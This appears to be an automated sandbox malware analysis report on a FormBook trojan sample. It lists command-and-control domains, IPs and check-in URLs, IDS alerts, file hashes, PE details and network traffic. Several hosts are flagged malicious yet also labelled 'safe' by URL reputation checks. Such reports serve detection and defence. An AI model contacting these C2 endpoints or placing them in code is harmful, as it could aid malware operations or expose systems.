http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.manageoceanaccount.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.jorgeporcayo.com/dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
http://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.iwccgroup.com/dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
www.extinctionbrews.com/dy8g/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fitnesstwentytwenty.com/dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fitnesstwentytwenty.com	34.102.136.180	true	false	unknown
sprinkleresources.com	78.47.57.7	true	true	unknown
www.professioneconsulenza.net	89.46.109.25	true	true	unknown
jorgeporcayo.com	162.241.62.54	true	true	unknown
invisiongc.net	34.102.136.180	true	false	unknown
www.manageoceanaccount.com	104.21.40.211	true	true	unknown
melodezu.com	64.227.87.162	true	true	unknown
www.iwccgroup.com	104.21.86.209	true	true	unknown
www.builtbydawn.com	172.67.129.33	true	true	unknown
www.melodezu.com	unknown	unknown	true	unknown
www.sprinkleresources.com	unknown	unknown	true	unknown
www.fitnesstwentytwenty.com	unknown	unknown	true	unknown
www.mydreamtv.net	unknown	unknown	true	unknown
www.jorgeporcayo.com	unknown	unknown	true	unknown
www.saludflv.info	unknown	unknown	true	unknown
www.cwdelrio.com	unknown	unknown	true	unknown
www.invisiongc.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.melodezu.com/dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown
http://www.sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown
http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw	false	Avira URL Cloud: malware	unknown
http://www.manageoceanaccount.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown
http://www.jorgeporcayo.com/dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown
http://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown
http://www.iwccgroup.com/dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown
www.extinctionbrews.com/dy8g/	true	Avira URL Cloud: safe	low
http://www.fitnesstwentytwenty.com/dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw	false	Avira URL Cloud: safe	unknown
http://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP	cscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.129.33	www.builtbydawn.com	United States	13335	CLOUDFLARENETUS	true
104.21.40.211	www.manageoceanaccount.com	United States	13335	CLOUDFLARENETUS	true
162.241.62.54	jorgeporcayo.com	United States	46606	UNIFIEDLAYER-AS-1US	true
64.227.87.162	melodezu.com	United States	14061	DIGITALOCEAN-ASNUS	true
34.102.136.180	fitnesstwentytwenty.com	United States	15169	GOOGLEUS	false
78.47.57.7	sprinkleresources.com	Germany	24940	HETZNER-ASDE	true
104.21.86.209	www.iwccgroup.com	United States	13335	CLOUDFLARENETUS	true
89.46.109.25	www.professioneconsulenza.net	Italy	31034	ARUBA-ASNIT	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452681
Start date:	22.07.2021
Start time:	17:56:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	85vLO1Rpcy.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@12/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.7% (good quality ratio 15.7%) Quality average: 69.3% Quality standard deviation: 35.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 56 Number of non-executed functions: 17
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 23.35.237.194, 92.122.145.220, 52.147.198.201, 104.43.193.48, 104.42.151.234, 20.50.102.62, 52.251.79.25, 23.216.77.146, 23.216.77.132, 40.112.88.60, 2.18.213.74, 2.18.213.56 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information VT rate limit hit for: /opt/package/joesandbox/database/analysis/452681/sample/85vLO1Rpcy.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.129.33	PQMW0W5h3X.exe	Get hash	malicious	Browse	www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0
	0FKzNO1g3P.exe	Get hash	malicious	Browse	www.builtbydawn.com/dy8g/?8pWL=Wlch&rVW8M4=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX
	orders.exe	Get hash	malicious	Browse	www.furlashop.site/ni6e/?W6=dhmVnxFiqqQHtzkp6eqPey57Y8PFMjt1OTneE2bUvMahMvc1ZtnhmpLaq/pNC70nk10eiFrAbg==&UlPt=GVoxsVvHVpd8Sl
104.21.40.211	TeMdJqNMM0.exe	Get hash	malicious	Browse	www.manageoceanaccount.com/dy8g/?Yn-PvXgP=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UG6jkznrjboy&x4=w4VXMtwX5BA
162.241.62.54	v8kZUFgdD4.exe	Get hash	malicious	Browse	www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx
	QxnlprRUTx.exe	Get hash	malicious	Browse	www.jorgeporcayo.com/dy8g/?Jn=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&2dM8l=bXbDpfbx6FA04L
	TeMdJqNMM0.exe	Get hash	malicious	Browse	www.jorgeporcayo.com/dy8g/?Yn-PvXgP=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUZNKSJRBZzW&x4=w4VXMtwX5BA
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	www.jorgeporcayo.com/dy8g/?3f=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX5dFzZpf8aR&XRtpal=y48HaFr
	New order 301534.pdf.exe	Get hash	malicious	Browse	www.tuzypop.com/sbqi/?ZjR=TyogNDuayMasT0oCbdt3Eat51QL3ELvKrHkWpVATBBZEFOGxOOifBgSTpUoy0eHE1TfRcYKQLQ==&ndnddT=ot9xbpDpf8H4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.professioneconsulenza.net	d6qU4nYIEp.exe	Get hash	malicious	Browse	89.46.109.25
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	89.46.109.25
	242jQP4mQP.exe	Get hash	malicious	Browse	89.46.109.25
www.manageoceanaccount.com	SWIFT MESSAGE DETAILS.xlsx	Get hash	malicious	Browse	104.21.40.211
	Payment_Ref_Advice.xlsx	Get hash	malicious	Browse	172.67.188.96
	TeMdJqNMM0.exe	Get hash	malicious	Browse	104.21.40.211
www.iwccgroup.com	0FKzNO1g3P.exe	Get hash	malicious	Browse	104.21.86.209

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	PAYMENT ADVICE.doc	Get hash	malicious	Browse	104.21.27.166
	PO20210722.xlsx	Get hash	malicious	Browse	162.159.130.233
	New order 11244332.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Z0hOr2pD7k.exe	Get hash	malicious	Browse	1.1.1.1
	USD_SLIP.docx	Get hash	malicious	Browse	104.21.19.245
	DHL JULY STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	104.21.19.200
	qK3005mdZn.exe	Get hash	malicious	Browse	172.67.168.51
	whesilox.exe	Get hash	malicious	Browse	172.67.188.154
	Bank contract,PDF.exe	Get hash	malicious	Browse	172.67.188.154
	Scan003000494 pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Swift-pdf.exe	Get hash	malicious	Browse	104.21.13.164
	Order _ 08201450.doc	Get hash	malicious	Browse	172.67.188.154
	aLLEK0YD2O.exe	Get hash	malicious	Browse	104.21.13.164
	Statement SKBMT 09818.jar	Get hash	malicious	Browse	66.235.200.145
	DOC98374933_JULY2021.EXE	Get hash	malicious	Browse	172.67.203.175
	Specifications_Details_20337_FLQ.exe	Get hash	malicious	Browse	172.67.188.154
	RFQ - 4 SCH 160 EQUAL TEE.doc	Get hash	malicious	Browse	172.67.169.145
	RIi1iCfuVK.exe	Get hash	malicious	Browse	104.21.51.99
	kkXJRT8vEl.exe	Get hash	malicious	Browse	104.21.51.99
	kS2dqbsDwD.exe	Get hash	malicious	Browse	104.25.234.53

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.969197227754621
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	85vLO1Rpcy.exe
File size:	177038
MD5:	91663bee11ec2466c36ff85805041fff
SHA1:	944de18e73bbcf9807c960ba925641211d46cd6e
SHA256:	b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
SHA512:	040ca62d7816cbaeb4983defb2905ac8c6e2358b3b10b43b44948d9d521bb194253e292f525a06109490a2d22ca6db2b20654d17cfadaa16ba1c3ae15d0a1a92
SSDEEP:	3072:Se8sLVMMnySqjooMKC8r8onTKtd5xYMhVwHlKKUQKZ/1CUmXAgrhIWS2OWYilqje:SEL6MyS8oB3KnIdD18gKUQKTCUpgrhIq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=Wu.\9&.\9&.\9&.$.&.\9&.\8&.\9&.$.&.\9&.$.&.\9&Rich.\9&........................PE..L....;.`...................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x401000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60F93B1D [Thu Jul 22 09:32:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	63b0867460dd31e465a337a5e3e003e6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000670h
mov byte ptr [ebp-00000288h], FFFFFFE9h
mov byte ptr [ebp-00000287h], FFFFFF90h
mov byte ptr [ebp-00000286h], 00000000h
mov byte ptr [ebp-00000285h], 00000000h
mov byte ptr [ebp-00000284h], 00000000h
mov byte ptr [ebp-00000283h], 00000055h
mov byte ptr [ebp-00000282h], FFFFFF8Bh
mov byte ptr [ebp-00000281h], FFFFFFECh
mov byte ptr [ebp-00000280h], 00000056h
mov byte ptr [ebp-0000027Fh], FFFFFF8Bh
mov byte ptr [ebp-0000027Eh], 00000075h
mov byte ptr [ebp-0000027Dh], 00000008h
mov byte ptr [ebp-0000027Ch], FFFFFFBAh
mov byte ptr [ebp-0000027Bh], FFFFFFEFh
mov byte ptr [ebp-0000027Ah], 00000012h
mov byte ptr [ebp-00000279h], 00000000h
mov byte ptr [ebp-00000278h], 00000000h
mov byte ptr [ebp-00000277h], 00000057h
mov byte ptr [ebp-00000276h], FFFFFFEBh
mov byte ptr [ebp-00000275h], 0000000Eh
mov byte ptr [ebp-00000274h], FFFFFF8Bh
mov byte ptr [ebp-00000273h], FFFFFFCAh
mov byte ptr [ebp-00000272h], FFFFFFD1h
mov byte ptr [ebp-00000271h], FFFFFFE8h
mov byte ptr [ebp-00000270h], FFFFFFC1h
mov byte ptr [ebp-0000026Fh], FFFFFFE1h
mov byte ptr [ebp-0000026Eh], 00000007h
mov byte ptr [ebp+00000000h], 00000000h

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3070	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10e8	0x1200	False	0.476996527778	data	4.706153126	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x234	0x400	False	0.3125	data	2.64202346139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
USER32.dll	GetDC, GrayStringA
OLEAUT32.dll	VarCyFromI4, VARIANT_UserSize, DispGetIDsOfNames, VariantChangeTypeEx, VarI4FromI1, SafeArrayGetElement, VarDecFromUI1, VarR8FromI4, VarDiv
WINSPOOL.DRV	ConnectToPrinterDlg, AddPortW, DeleteFormW, EnumPrintProcessorDatatypesA
dbghelp.dll	MakeSureDirectoryPathExists, SymGetLineFromAddr64
WS2_32.dll	WSAAsyncGetProtoByNumber, htons, WSACleanup, getprotobynumber, ntohs

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/22/21-17:58:53.783078	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49760	34.102.136.180	192.168.2.4
07/22/21-17:59:47.938975	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49769	80	192.168.2.4	172.67.129.33
07/22/21-17:59:47.938975	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49769	80	192.168.2.4	172.67.129.33
07/22/21-17:59:47.938975	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49769	80	192.168.2.4	172.67.129.33
07/22/21-17:59:53.264167	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49770	34.102.136.180	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 17:58:53.597157001 CEST	49760	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:58:53.640444040 CEST	80	49760	34.102.136.180	192.168.2.4
Jul 22, 2021 17:58:53.643758059 CEST	49760	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:58:53.644109964 CEST	49760	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:58:53.687212944 CEST	80	49760	34.102.136.180	192.168.2.4
Jul 22, 2021 17:58:53.783077955 CEST	80	49760	34.102.136.180	192.168.2.4
Jul 22, 2021 17:58:53.783103943 CEST	80	49760	34.102.136.180	192.168.2.4
Jul 22, 2021 17:58:53.783427000 CEST	49760	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:58:53.783457994 CEST	49760	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:58:54.278949022 CEST	49760	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:58:54.322173119 CEST	80	49760	34.102.136.180	192.168.2.4
Jul 22, 2021 17:58:58.867496967 CEST	49761	80	192.168.2.4	64.227.87.162
Jul 22, 2021 17:58:59.059680939 CEST	80	49761	64.227.87.162	192.168.2.4
Jul 22, 2021 17:58:59.060267925 CEST	49761	80	192.168.2.4	64.227.87.162
Jul 22, 2021 17:58:59.060558081 CEST	49761	80	192.168.2.4	64.227.87.162
Jul 22, 2021 17:58:59.252859116 CEST	80	49761	64.227.87.162	192.168.2.4
Jul 22, 2021 17:58:59.252990961 CEST	80	49761	64.227.87.162	192.168.2.4
Jul 22, 2021 17:58:59.253041983 CEST	80	49761	64.227.87.162	192.168.2.4
Jul 22, 2021 17:58:59.253340006 CEST	49761	80	192.168.2.4	64.227.87.162
Jul 22, 2021 17:58:59.253437996 CEST	49761	80	192.168.2.4	64.227.87.162
Jul 22, 2021 17:58:59.447355032 CEST	80	49761	64.227.87.162	192.168.2.4
Jul 22, 2021 17:59:04.433288097 CEST	49762	80	192.168.2.4	78.47.57.7
Jul 22, 2021 17:59:04.503684998 CEST	80	49762	78.47.57.7	192.168.2.4
Jul 22, 2021 17:59:04.503810883 CEST	49762	80	192.168.2.4	78.47.57.7
Jul 22, 2021 17:59:04.504060984 CEST	49762	80	192.168.2.4	78.47.57.7
